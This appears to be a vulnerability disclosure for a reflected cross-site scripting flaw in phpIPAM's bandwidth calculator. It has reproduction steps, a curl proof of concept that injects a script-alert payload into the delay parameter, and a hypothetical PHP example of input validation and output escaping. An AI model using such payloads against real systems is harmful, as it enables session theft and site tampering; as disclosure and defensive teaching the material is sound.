Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
1. I opened this page: localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. I analyzed the code at lines 41-45 of https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. Next, I used Burp Suite to intercept the request and changed the value of some parameters, such as wsize, delay and fsize (lines 13-15 of https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php), to the <script>alert(1)</script> payload.
4. I then triggered the reflected XSS payload <script>alert(1)</script>.
//PoC
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
-b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
--data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
$'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'
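
The mitigation for this class of bug, as an added example that is not phpIPAM's code or its actual fix: the three parameters named in the report (wsize, delay, fsize) are validated as numbers on input and HTML-escaped on output. The function names, the HTML markup and the assumption that all three values are non-negative numbers are hypothetical.

```php
<?php
// Added illustration; NOT phpIPAM's code. All function names are hypothetical.

// Vulnerable pattern: a request value is concatenated into HTML unchanged.
function render_unsafe(array $post): string {
    return "<td>Delay: " . ($post['delay'] ?? '') . " ms</td>";
}

// Input validation: accept only non-negative decimal numbers (assumed format)
// for the listed parameters and reject everything else.
function parse_numeric_params(array $post, array $names): array {
    $clean = [];
    foreach ($names as $name) {
        $raw = $post[$name] ?? '';
        if (!is_string($raw) || !preg_match('/^\d+(\.\d+)?\z/', $raw)) {
            // The message names the parameter but never echoes the raw value.
            throw new InvalidArgumentException("Invalid value for $name");
        }
        $clean[$name] = $raw + 0; // numeric string -> int or float
    }
    return $clean;
}

// Output encoding: applied to every value written into HTML, validated or not.
function h($value): string {
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(array $post): string {
    try {
        $p = parse_numeric_params($post, ['wsize', 'delay', 'fsize']);
    } catch (InvalidArgumentException $e) {
        return '<div class="alert alert-danger">' . h($e->getMessage()) . '</div>';
    }
    return "<td>Delay: " . h($p['delay']) . " ms</td>";
}

// Constructed sample input mirroring the request body in the PoC above.
$sample = ['wsize' => '50000', 'delay' => '<script>alert(1)</script>', 'fsize' => '1024'];
$valid  = ['wsize' => '50000', 'delay' => '20', 'fsize' => '1024'];

echo render_unsafe($sample), "\n"; // markup from the request reaches the response
echo render_safe($sample), "\n";   // rejected at validation, no raw value reflected
echo render_safe($valid), "\n";    // numeric value rendered, escaped
```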